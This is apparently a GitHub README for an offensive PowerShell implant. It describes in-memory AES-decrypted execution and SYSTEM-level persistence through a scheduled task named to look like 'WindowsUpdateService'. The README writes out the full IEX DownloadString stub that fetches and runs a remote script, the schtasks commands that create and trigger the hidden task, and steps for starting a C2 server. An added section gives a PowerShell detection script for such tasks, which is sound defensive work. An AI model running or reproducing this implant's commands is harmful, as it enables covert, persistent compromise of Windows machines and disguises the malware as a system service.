Khoulykid/Malware

Encrypted PowerShell Implant with SYSTEM-Level Persistence

This project demonstrates a fileless, encrypted PowerShell-based implant that achieves persistent execution with SYSTEM privileges via the Windows Task Scheduler.

⚠️ Disclaimer

This code is provided for educational and authorized testing purposes only. Unauthorized use of this script against systems without explicit permission is illegal and unethical. The authors assume no liability for any misuse or damage caused.

📜 Overview

This project consists of a PowerShell script (implant.ps1) that:

  • Executes an encrypted payload entirely in memory.
  • Installs a SYSTEM-level scheduled task for persistence.
  • Downloads a fresh copy of the implant on each reboot to maintain stealth and flexibility.

🔐 Features

  • Encrypted Payload Execution:
    • AES-CBC encryption with a hardcoded Base64 key and encrypted blob.
    • Decrypted and executed fully in memory using Invoke-Expression.
  • SYSTEM-Level Persistence:
    • Creates a scheduled task (WindowsUpdateService) that:
      • Runs with highest privileges (SYSTEM).
      • Triggers on system startup.
      • Executes a small, encoded PowerShell stub that fetches the implant remotely.
  • Fileless Appearance:
    • No persistent implant is stored on disk.
    • Uses a Base64-encoded stub that pulls the actual script dynamically at runtime.

⚙️ Setup Details

  1. Encrypted Payload
    • The payload (payload.enc) is a Base64-encoded string consisting of the IV + ciphertext.
    • Encryption uses AES-128-CBC, and the key is provided as a Base64 string.
  2. Stub Command
    • Encoded and embedded in the scheduled task:
      IEX (New-Object Net.WebClient).DownloadString('http://192.168.56.1:8000/install.ps1')
  3. Task Creation
    • The task is created using:
      schtasks.exe /Create /RU "SYSTEM" /RL HIGHEST /SC ONSTART `
        /TN "WindowsUpdateService" `
        /TR "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <stub>" /F
    • It is then immediately triggered:
      schtasks.exe /Run /TN "WindowsUpdateService"
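The stub and task described in steps 2 and 3 leave a recognizable footprint on the host: a boot-triggered task registered for SYSTEM at the highest run level, whose action is powershell.exe with -WindowStyle Hidden and an -EncodedCommand that decodes to a download-and-Invoke-Expression one-liner. The following PowerShell is an added detection example, not code from this repository: it enumerates scheduled tasks, decodes any -EncodedCommand argument (Base64 of UTF-16LE text) and reports the tasks that match this pattern. It assumes the built-in ScheduledTasks module (Windows 8 / Server 2012 and later); the function names and the keyword list are this example's own choices.

```powershell
# Added example (not part of Khoulykid/Malware): hunt for scheduled tasks that run an
# encoded PowerShell command which decodes to a remote download-and-execute stub.
# Assumes the ScheduledTasks module (Get-ScheduledTask). Run elevated to see all tasks.

function Get-EncodedCommandText {
    param([string]$Arguments)
    # powershell.exe accepts -EncodedCommand, -enc and -e for the same parameter;
    # this regex covers those three common spellings (a simplification).
    # The argument is Base64 of UTF-16LE text, hence the Unicode decode.
    if ($Arguments -match '-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]+)') {
        try {
            return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3]))
        } catch { return $null }
    }
    return $null
}

function Find-EncodedDownloaderTasks {
    # Primitives that turn a one-liner into a remote stage loader. Keyword list is
    # this example's choice; extend it to match your environment's tooling.
    $downloader = 'Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Start-BitsTransfer'

    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if ($action.Execute -notmatch 'powershell|pwsh') { continue }
            $decoded = Get-EncodedCommandText $action.Arguments
            if (-not $decoded) { continue }

            [pscustomobject]@{
                TaskName    = $task.TaskName
                TaskPath    = $task.TaskPath
                RunAs       = $task.Principal.UserId      # e.g. SYSTEM
                RunLevel    = $task.Principal.RunLevel    # Highest for /RL HIGHEST
                BootTrigger = [bool]($task.Triggers |
                                  Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskBootTrigger' })
                Hidden      = ($action.Arguments -match '-w(indowstyle)?\s+hidden')
                Downloader  = ($decoded -match $downloader)
                Decoded     = $decoded
            }
        }
    }
}

# Report only the tasks whose decoded command reaches out to fetch and run code.
Find-EncodedDownloaderTasks | Where-Object { $_.Downloader } | Format-List
```

The check keys on the encoded-command and download primitives rather than on the task name, because a name such as WindowsUpdateService is arbitrary and trivially changed. To confirm when such a task appeared, correlate the hit with task-registration events: Security event 4698 (requires the Object Access / Other Object Access Events audit subcategory) and Microsoft-Windows-TaskScheduler/Operational event 106.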

🧪 Testing Environment

  • Tested on: Windows 10 (x64)
  • Listener/Server: Python HTTP server running on http://192.168.56.1:8000/
  • Required: Ensure install.ps1 is hosted on the server and accessible at boot time.

📁 Files

  • implant.ps1: Main implant script with decryption + persistence setup.
  • payload.enc: Encrypted Base64 payload (not included here for safety).
  • README.md: This documentation file.

✅ Usage

🧠 Before running, replace the aesKeyB64 and encryptedBlobB64 values with your actual key and payload data.

  1. Start the Command and Control (C2) server:
    python3 C2Server4.py
